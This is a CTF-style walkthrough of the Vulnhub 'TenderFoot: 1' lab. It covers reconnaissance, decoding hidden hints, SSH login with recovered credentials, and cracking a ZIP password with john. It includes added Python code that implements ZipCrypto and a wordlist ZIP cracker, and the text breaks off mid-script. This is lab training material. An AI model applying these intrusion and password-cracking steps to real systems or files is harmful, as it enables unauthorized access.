Vulnhub: TenderFoot 1 Detailed Walkthrough


Author: jason_huawen

Target basics

Name: TenderFoot: 1

URL:

https://www.vulnhub.com/entry/tenderfoot-1,581/

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ sudo netdiscover -i eth1
 Currently scanning: 192.168.69.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:1b:5b:15      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.239  08:00:27:1b:eb:34      1      60  PCS Systemtechnik GmbH                                                   


The netdiscover tool bundled with Kali Linux identifies the target host's IP address as 192.168.56.239 (the 08:00:27 OUI is VirtualBox's; 192.168.56.1 and .100 are, as usual, the host-only adapter and VirtualBox's own DHCP server).

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.239 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-29 08:21 EST
Nmap scan report for bogon (192.168.56.239)
Host is up (0.000070s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:b7:2d:95:e1:06:7f:a3:f1:8e:bc:5b:4c:29:19:61 (RSA)
|   256 42:0c:c9:6d:1d:e9:84:19:6a:8a:d5:51:2c:69:c6:98 (ECDSA)
|_  256 14:4d:74:42:78:67:9b:f3:dd:00:40:24:4d:12:c9:de (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:1B:EB:34 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.64 seconds

The NMAP scan shows two open ports on the target: 22 (SSH, OpenSSH 7.2p2, an Ubuntu 16.04 build) and 80 (HTTP, Apache 2.4.18).

Get Access

Browsing port 80 returns the Apache2 default page, but the page source contains the following comment:

<!--
G00D! 
check /robots.txt directory.
-->

The author hints at checking the directories listed in /robots.txt, so fetch that file:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/robots.txt                                    
Found Something ?

Here is a directory open it 

/hint
                            

It points to a directory, /hint:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/hint/

<!--
EBPV6X27L5PV6X27L5PV6X27L5PV6X27L4FHYICOGB2GQ2LOM4QEQZLSMUQSAIBAEAQCA7AKPQQFI4TZEBZW63LFORUGS3THEBSWY43FEF6AUIBNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LIKIVXHK3LFOJQXIZJANVXXEZJAHIUQ====

Decrypt it!
-->


This looks like base64; try decoding it:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ echo 'EBPV6X27L5PV6X27L5PV6X27L5PV6X27L4FHYICOGB2GQ2LOM4QEQZLSMUQSAIBAEAQCA7AKPQQFI4TZEBZW63LFORUGS3THEBSWY43FEF6AUIBNFUWS2LJNFUWS2LJNFUWS2LJNFUWS2LIKIVXHK3LFOJQXIZJANVXXEZJAHIUQ====' | base64 -d
��}�/���}�/���}�/���}�/�G`��▒�Cb�3�A��1D�@�
=#��V�r�9Kt��c��^�P�ME�زME�زME�زME�ز
!U�+r�8�!�@5U��@�base64: invalid input

base64 decoding only produces garbage plus an "invalid input" error. Two things give the real encoding away: the alphabet is only A-Z and 2-7, and the string ends in four "=" characters, which base64 never does (it pads with at most two). Still, trying the candidate encodings one by one in the CyberChef online tool:

base32 decoding finally works, but the message it reveals is (ha):

| N0thing Here!      |
| Try something else!|
 --------------------
Enumerate more :)
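
The trial-and-error above (base64 fails, base32 works) can be done offline in a few lines. The following helper is an added example and is not part of the original write-up: it tries the common text encodings in strict mode, keeps only the candidates that decode to printable text, and adds the alphabet/padding heuristic described above. The two sample inputs are the base64 string (JDk5OTkwJA==) and the base32 KEY (OBQXG43XMQ5FSMDVINZDIY3LJUZQ====) that appear later on this page.

```python
import base64
import binascii

# Decoders tried in order, all strict, so a blob that merely happens to use a
# compatible alphabet is rejected instead of silently producing garbage.
_DECODERS = {
    "base64": lambda s: base64.b64decode(s, validate=True),
    "base32": lambda s: base64.b32decode(s),
    "hex":    lambda s: bytes.fromhex(s),
}

_BASE32_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZ234567")


def _printable(data: bytes):
    """Return the decoded text if every byte is printable ASCII (CR/LF/TAB allowed), else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def guess_encoding(blob: str) -> dict:
    """Try each decoder on the blob; return {encoding: text} for the ones that yield printable text."""
    blob = "".join(blob.split())          # CTF hints are often line-wrapped
    found = {}
    for name, decode in _DECODERS.items():
        try:
            text = _printable(decode(blob))
        except ValueError:                # binascii.Error is a ValueError: wrong alphabet / bad padding
            continue
        if text is not None:
            found[name] = text
    return found


def looks_like_base32(blob: str) -> bool:
    """Shape test: base32 uses A-Z and 2-7 only (no lowercase, no 0/1/8/9),
    comes in 8-character groups and may pad with up to six '='."""
    blob = "".join(blob.split())
    body = blob.rstrip("=")
    pad = len(blob) - len(body)
    return (body.isupper() and set(body) <= _BASE32_ALPHABET
            and pad <= 6 and len(blob) % 8 == 0)


if __name__ == "__main__":
    # Constructed sample inputs: the two short blobs found on this box.
    for sample in ("JDk5OTkwJA==", "OBQXG43XMQ5FSMDVINZDIY3LJUZQ===="):
        print(sample, "->", guess_encoding(sample), "| base32-shaped:", looks_like_base32(sample))
```

The strict flags matter: without `validate=True`, Python's base64 decoder happily skips the four "=" and returns 21 bytes of noise for the base32 string, which is exactly the garbage `base64 -d` printed above.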

So, on to directory brute-forcing:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/29 08:28:59 Starting gobuster in directory enumeration mode
===============================================================
/hint                 (Status: 301) [Size: 315] [--> http://192.168.56.239/hint/]
/server-status        (Status: 403) [Size: 279]
Progress: 217209 / 220561 (98.48%)===============================================================
2022/11/29 08:29:24 Finished

Only the already-known directory turned up, so switch wordlists and scan again; this time another directory appears:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/29 08:46:59 Starting gobuster in directory enumeration mode
===============================================================
/fotocd               (Status: 301) [Size: 317] [--> http://192.168.56.239/fotocd/]
Progress: 141014 / 141709 (99.51%)===============================================================
2022/11/29 08:47:16 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/fotocd/


<!--

+++++ ++[-> +++++ ++<]> +++++ +++++ ++... ..... ..... ....< +++++ +[->-
----- <]>-- ----- ----- .---. <++++ ++++[ ->+++ +++++ <]>.- ----- .<+++
+++[- >++++ ++<]> +++.< +++++ ++[-> ----- --<]> ----- .<+++ ++[-> +++++
<]>+. +++++ .<+++ +[->+ +++<] >++++ +++.< +++[- >+++< ]>+++ .<+++ +++[-
>---- --<]> ----- ----. ----- ----. ----. .<+++ +++[- >---- --<]> -----
----- --.-- -.<++ +++++ [->++ +++++ <]>++ ..... ..... ..... ..<++ ++++[
->--- ---<] >---- ----- ---.- --.++ +.--- .<+++ ++++[ ->+++ ++++< ]>+++
+++++ +.<++ ++++[ ->+++ +++<] >+.-- ---.< +++++ +++[- >---- ----< ]>---
-.<++ +++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++ [->-- -<]>- .++++ ++.<+
+++++ +++[- >---- ----- <]>-- --.<+ +++++ ++[-> +++++ +++<] >++++ ++.++
+++++ ++.++ ++++. ----- --.<+ ++[-> ---<] >-.<+ +++++ ++[-> ----- ---<]
>---- .<+++ +++++ +[->+ +++++ +++<] >++++ .--.< +++[- >---< ]>--- --.<+
++[-> +++<] >++++ .---- .<+++ [->-- -<]>- ---.< +++[- >+++< ]>+++ .----
----. <++++ ++++[ ->--- ----- <]>-- ---.< +++++ [->++ +++<] >++++ ++.<+
+++++ +[->- ----- -<]>- .---. <++++ +++++ [->++ +++++ ++<]> +++++ +++++
++++. ---.< +++++ +++[- >---- ----< ]>--- ---.< +++++ ++++[ ->+++ +++++
+<]>+ +++++ ++.<+ +++[- >---- <]>-- --.<+ ++[-> +++<] >++++ +.<++ +++++
[->-- ----- <]>-- ----- -.<++ ++++[ ->--- ---<] >---- ----- .---. <++++
[->++ ++<]> +++++ +.... <++++ +++[- >++++ +++<] >+++. <++++ [->++ ++<]>
++++. ---.+ +++++ +++.< +++++ +++[- >---- ----< ]>--- ----- ----- -.<++
+++++ ++[-> +++++ ++++< ]>+++ +++++ .<+++ [->-- -<]>- .++++ ++.<+ +++++
+++[- >---- ----- <]>-- --.<+ +++++ ++[-> +++++ +++<] >++++ ++++. -----
--.<+ +++[- >++++ <]>++ +++.< ++++[ ->--- -<]>- .<+++ +++++ [->-- -----
-<]>- ----. <++++ ++++[ ->+++ +++++ <]>++ +.<++ +[->+ ++<]> +++++ +.<++
+[->- --<]> ----. -.<++ +++++ [->-- ----- <]>-- ---.< +++[- >---< ]>---
--.<+ +++++ ++[-> +++++ +++<] >++++ +++++ +++++ +.--- ----- -.<++ +++++
+[->- ----- --<]> ----- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++
.-.-- ----- --.<+ +++++ ++[-> ----- ---<] >---- -.<++ +++++ ++[-> +++++
++++< ]>+++ +.--. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.<++ +++++
+[->- ----- --<]> ----- -.<++ +[->- --<]> ---.< +++++ +++[- >++++ ++++<
]>+++ ++.++ +++++ ++.++ ++++. <+++[ ->--- <]>-- ----. <+++[ ->+++ <]>++
++.<+ +++++ +++[- >---- ----- <]>-. <++++ ++++[ ->+++ +++++ <]>++ +++++
++.++ +++.+ +++++ .---- -.<++ +++++ +[->- ----- --<]> ----- ----- -----
.<+++ +++++ +[->+ +++++ +++<] >++++ .--.< +++[- >---< ]>--- --.<+ ++[->
+++<] >++++ .<+++ +++++ +[->- ----- ---<] >-.<+ +++++ ++[-> +++++ +++<]
>+.++ ..<++ +[->+ ++<]> +++.+ +++++ .---- ---.+ +++++ .<+++ +++++ +[->-
----- ---<] >---. <++++ [->-- --<]> ---.- --.<+ +++[- >++++ <]>++ ++++.
...<+ +++++ ++[-> +++++ +++<] >++.< ++++[ ->+++ +<]>+ +++++ +.<++ +++++
++[-> ----- ----< ]>--- ----- .<+++ +++++ +[->+ +++++ +++<] >++.. <+++[
->--- <]>-- .<+++ +++++ [->-- ----- -<]>- ----- --.<+ +++++ ++[-> +++++
+++<] >++++ +++++ +++++ ++.-. +++.+ +.<++ +++++ +[->- ----- --<]> -----
-.<++ +[->- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >++.+ +++++ .<+++
[->-- -<]>- -.+++ +++.< ++++[ ->--- -<]>- --.<+ +++[- >++++ <]>++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- ----- .<+++ +++++ [->++ +++++ +<]>+
.---- ----. .<+++ [->-- -<]>- -.<++ +++++ +[->- ----- --<]> ----- ---.<
+++++ ++++[ ->+++ +++++ +<]>+ +++.- -.<++ +[->- --<]> ----- .<+++ [->++
+<]>+ +++.- ---.< +++[- >---< ]>--- -.<++ +[->+ ++<]> +++.- ----- --.<+
+++++ [->-- ----< ]>-.+ +++++ +++.+ +++++ +.<++ ++++[ ->+++ +++<] >++++
+++++ .<+++ +++++ ++[-> ----- ----- <]>-- ----- ----- .---. <++++ +++++
[->++ +++++ ++<]> +++++ +++++ ++++. ---.< +++++ +++[- >---- ----< ]>---
---.< +++++ +++[- >++++ ++++< ]>+++ +++++ +++++ +.+.+ ++++. <++++ +++[-
>---- ---<] >---- ----- .<+++ +++[- >---- --<]> ----- ----. ---.< ++++[
->+++ +<]>+ +++++ ....< +++++ ++[-> +++++ ++<]> +++.< ++++[ ->+++ +<]>+
+++.- --.++ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- ----- .<+++
+++++ [->++ +++++ +<]>+ ++++. +++++ ++++. +++++ ++.-- ----- -.--- -----
.<+++ [->++ +<]>+ +++.< ++++[ ->--- -<]>- .<+++ +[->+ +++<] >+++. <+++[
->--- <]>-- ----. <++++ ++++[ ->--- ----- <]>-- ---.< +++++ +++[- >++++
++++< ]>+++ +++++ +++++ .++.+ ++.<+ ++[-> ---<] >---- .<+++ +++++ [->--
----- -<]>- ----. <++++ +[->+ ++++< ]>+.< ++++[ ->--- -<]>- .<+++ ++[->
----- <]>-- -.--- .<+++ +[->+ +++<] >++++ ++... .<+++ +++[- >++++ ++<]>
+++.< ++++[ ->--- -<]>- ----- -..<+ +++[- >++++ <]>++ ++.<+ +++++ [->--
----< ]>.<+ +++++ [->++ ++++< ]>+++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ [->-- ----< ]>--- ----. +.<++ ++[-> ----< ]>---
-.--- .<

What is this?
Ask to G00GLE !


This is a Brainfuck program (an esoteric programming language, not an encryption scheme); the hidden message is whatever it prints when run.

Running it through an online interpreter yields:

=================
JDk5OTkwJA==
=================

Did you found username ?
if yes:
    Then you have cred. of one user, enter into user account 
    by ssh port. syntax:{ssh username@IP}
if not:
    Then enumerate more :)
    G00D LUCK !
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ echo 'JDk5OTkwJA==' | base64 -d
$99990$          

Now we have a password, but no username. Re-run the scan with file extensions:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ gobuster dir -u http://192.168.56.239 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.js,.txt,.sh,.html
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.239
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,html,php,js,txt
[+] Timeout:                 10s
===============================================================
2022/11/29 08:59:19 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 11422]
/robots.txt           (Status: 200) [Size: 191]
/entry.js             (Status: 200) [Size: 7]

This reveals /entry.js. (This step is key: in my earlier pentests I only ever looked for .html, .sh, .php and .txt files and never for .js.)

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/entry.js
monica

This should be the username, so log in over SSH as monica with the password $99990$:

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ssh monica@192.168.56.239
monica@192.168.56.239's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


39 packages can be updated.
26 updates are security updates.


Last login: Mon Oct  5 01:21:39 2020 from 10.0.2.60
monica@TenderFoot:~$ id
uid=1001(monica) gid=1001(monica) groups=1001(monica)
monica@TenderFoot:~$ sudo -l
[sudo] password for monica: 
Sorry, user monica may not run sudo on TenderFoot.
monica@TenderFoot:~$ ls -alh
total 36K
drwxr-xr-x 4 monica monica 4.0K Oct  4  2020 .
drwxr-xr-x 4 root   root   4.0K Oct  4  2020 ..
-rw-r--r-- 1 root   root    593 Oct  4  2020 .bash_history
-rw-r--r-- 1 monica monica  220 Oct  4  2020 .bash_logout
-rw-r--r-- 1 monica monica 3.7K Oct  4  2020 .bashrc
drwx------ 2 monica monica 4.0K Oct  4  2020 .cache
drwxr-xr-x 3 root   root   4.0K Oct  4  2020 joey
-rw-r--r-- 1 monica monica  655 Oct  4  2020 .profile
-rw-r--r-- 1 root   root   2.8K Oct  4  2020 user1.txt
monica@TenderFoot:~$ cat user1.txt
                                                            @@@@@@@,                                 
                                                          @@@@@@@@@&                                
                                                         &@@@@@@@@@@*                               
                                                        @@@@@@@@@@@@,                               
                                                      .@@@@@@@@@@@@@                                
                                                     @@@@@@@@@@@@@@                                 
                                                   @@@@@@@@@@@@@@@                                  
                                                /@@@@@@@@@@@@@@@&                                   
                                             .@@@@@@@@@@@@@@@@@,                                    
                                           @@@@@@@@@@@@@@@@@@@                                      
                                        @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*                     
                    (%%%%%%%%%%%%*   ,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.                  
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@                  
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%                  
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.                   
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&                   
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/                  
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@                   
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@&.                    
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/                    
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@(                    
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,                     
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*                      
                   @@@@@@@@@@@@@@@@  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/                      
                   @@@@@@@@@@@@@@@%   @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@.  

========================================================
========================================================

Great! Y0U F0UND Y0UR FIR5T FL4G!

Try to Find out user2.txt (your 2nd flag) :)

========================================================
========================================================
monica@TenderFoot:~$ find / -name user2.txt -type f 2>/dev/null
monica@TenderFoot:~$ cat .bash_history
======================================================================================
======================================================================================
It's G00D to check bash history, sometimes we got hints from history.
it contains all commands which are execute earlier, mayb be those commands when this box was created !

But unfortunately i haven't leave anything here :)
Try Something Else!
======================================================================================
======================================================================================
monica@TenderFoot:~$ 

monica@TenderFoot:~$ cd joey
monica@TenderFoot:~/joey$ ls -alh
total 12K
drwxr-xr-x 3 root   root   4.0K Oct  4  2020 .
drwxr-xr-x 4 monica monica 4.0K Oct  4  2020 ..
drwxr-xr-x 3 root   root   4.0K Oct  4  2020 have
monica@TenderFoot:~/joey$ cd have
monica@TenderFoot:~/joey/have$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct  4  2020 .
drwxr-xr-x 3 root root 4.0K Oct  4  2020 ..
drwxr-xr-x 3 root root 4.0K Oct  4  2020 a
monica@TenderFoot:~/joey/have$ cd a
monica@TenderFoot:~/joey/have/a$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct  4  2020 .
drwxr-xr-x 3 root root 4.0K Oct  4  2020 ..
drwxr-xr-x 3 root root 4.0K Oct  4  2020 gift
monica@TenderFoot:~/joey/have/a$ cd gift
monica@TenderFoot:~/joey/have/a/gift$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct  4  2020 .
drwxr-xr-x 3 root root 4.0K Oct  4  2020 ..
drwxr-xr-x 3 root root 4.0K Oct  4  2020 for
monica@TenderFoot:~/joey/have/a/gift$ cd for
monica@TenderFoot:~/joey/have/a/gift/for$ ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct  4  2020 .
drwxr-xr-x 3 root root 4.0K Oct  4  2020 ..
drwxr-xr-x 2 root root 4.0K Oct  4  2020 monica
monica@TenderFoot:~/joey/have/a/gift/for$ cd monica
monica@TenderFoot:~/joey/have/a/gift/for/monica$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Oct  4  2020 .
drwxr-xr-x 3 root root 4.0K Oct  4  2020 ..
-rw-r--r-- 1 root root   53 Oct  4  2020 note.txt
monica@TenderFoot:~/joey/have/a/gift/for/monica$ cat note.txt


Got to /fotocd/0x0343548764 directory in browser.

monica@TenderFoot:~/joey/have/a/gift/for/monica$ 

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ curl http://192.168.56.239/fotocd/0x0343548764/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /fotocd/0x0343548764</title>
 </head>
 <body>
<h1>Index of /fotocd/0x0343548764</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/fotocd/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/compressed.gif" alt="[   ]"></td><td><a href="joey.zip">joey.zip</a></td><td align="right">2020-10-04 18:00  </td><td align="right">911 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="note.txt">note.txt</a></td><td align="right">2020-10-04 18:01  </td><td align="right"> 48 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.56.239 Port 80</address>
</body></html>
                  

Download both files to the Kali Linux box.

Privilege escalation

┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ mv ~/Downloads/joey.zip .
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
joey.zip  nmap_full_scan
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip joey.zip              
Archive:  joey.zip
[joey.zip] gift.zip password: 
 extracting: gift.zip                
  inflating: note.txt                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.zip  joey.zip  nmap_full_scan  note.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat note.txt                                   
=======================================================
=======================================================
Not this time DUDE!

Just G00GLE and learn how to crack zip passwords :)

you will learn new thing!
=======================================================
=======================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip gift.zip 
Archive:  gift.zip
[gift.zip] gift.txt password:                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ zip2john gift.zip > zip_hash        
ver 2.0 efh 5455 efh 7875 gift.zip/gift.txt PKZIP Encr: TS_chk, cmplen=255, decmplen=717, crc=52CFB060 ts=8D77 cs=8d77 type=8
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.zip  joey.zip  nmap_full_scan  note.txt  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zip_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ck3d           (gift.zip/gift.txt)     
1g 0:00:00:00 DONE (2022-11-29 09:05) 1.282g/s 9914Kp/s 9914Kc/s 9914KC/s h4mepl..h0tdamn
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ unzip gift.zip 
Archive:  gift.zip
[gift.zip] gift.txt password: 
  inflating: gift.txt                
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ ls
gift.txt  gift.zip  joey.zip  nmap_full_scan  note.txt  zip_hash
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/Tender]
└─$ cat gift.txt
===================================================================================================
===================================================================================================
Hahaha! there is no gift !
Your Bad Luck!

But what happened if you don't get gift.

Take a hint from my side, which may help you to solve this box further.

I make a binary to get another user's shell,
Just google, command for search/find SUID or binaries and figure it out how to execute this binary.

G00D LUCK! :)
=================================================================================================
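
The note's hint is about dictionary attacks on ZIP passwords. gift.zip uses the legacy ZipCrypto scheme (zip2john reports "PKZIP Encr", and john loads it as the PKZIP format), which is why rockyou.txt went through at roughly 10M candidates per second above: every entry starts with a 12-byte encryption header whose last byte must match a known check byte (the high byte of the CRC, or of the DOS timestamp when the entry uses a data descriptor, which is what zip2john's TS_chk flag means), so a wrong password is rejected after decrypting just 12 bytes. The Python below is an added example, not from the write-up: it implements the ZipCrypto key schedule, builds a small encrypted archive in memory (a constructed fixture whose file name, contents and password mirror this box, but which is not gift.zip), and runs a wordlist against it the way john does, using the standard library's own decrypter for the guess check.

```python
import io
import struct
import zipfile
import zlib


def _crc_entry(n: int) -> int:
    for _ in range(8):
        n = (n >> 1) ^ 0xEDB88320 if n & 1 else n >> 1
    return n


_CRC_TABLE = [_crc_entry(n) for n in range(256)]


class ZipCryptoKeys:
    """PKWARE 'traditional' encryption key schedule (APPNOTE section 6.1)."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for b in password:
            self.update(b)

    def update(self, b: int) -> None:
        self.k0 = (self.k0 >> 8) ^ _CRC_TABLE[(self.k0 ^ b) & 0xFF]
        self.k1 = (self.k1 + (self.k0 & 0xFF)) & 0xFFFFFFFF
        self.k1 = (self.k1 * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = (self.k2 >> 8) ^ _CRC_TABLE[(self.k2 ^ (self.k1 >> 24)) & 0xFF]

    def stream_byte(self) -> int:
        t = (self.k2 | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF


def zipcrypto_encrypt(password: bytes, plaintext: bytes) -> bytes:
    keys, out = ZipCryptoKeys(password), bytearray()
    for p in plaintext:
        out.append(p ^ keys.stream_byte())
        keys.update(p)                       # the keystream is driven by the plaintext
    return bytes(out)


def zipcrypto_decrypt(password: bytes, ciphertext: bytes) -> bytes:
    keys, out = ZipCryptoKeys(password), bytearray()
    for c in ciphertext:
        p = c ^ keys.stream_byte()
        keys.update(p)
        out.append(p)
    return bytes(out)


def build_encrypted_zip(name: bytes, data: bytes, password: bytes) -> bytes:
    """Single-entry, STORED, ZipCrypto-protected archive built by hand (constructed test fixture)."""
    crc = zlib.crc32(data) & 0xFFFFFFFF
    # 12-byte encryption header: 11 bytes a real archiver fills with random data
    # (zeros here for determinism), then the check byte: the CRC's high byte.
    header = b"\x00" * 11 + bytes([crc >> 24])
    body = zipcrypto_encrypt(password, header + data)
    dos_time, dos_date = 0x9000, 0x5144       # 18:00, 2020-10-04
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, 1, 0, dos_time, dos_date,
                        crc, len(body), len(data), len(name), 0) + name
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, 1, 0, dos_time, dos_date,
                          crc, len(body), len(data), len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local) + len(body), 0)
    return local + body + central + eocd


def crack_zip(archive: bytes, wordlist):
    """Dictionary attack: return the first password that opens the first entry, or None."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        name = zf.namelist()[0]
        for guess in wordlist:
            try:
                zf.read(name, pwd=guess.encode())
                return guess
            except RuntimeError:             # check-byte mismatch: 255 of 256 wrong guesses die here
                continue
            except zipfile.BadZipFile:       # the 1-in-256 false positive, caught by the CRC check
                continue
    return None


if __name__ == "__main__":
    archive = build_encrypted_zip(b"gift.txt", b"Hahaha! there is no gift !\n", b"h4ck3d")
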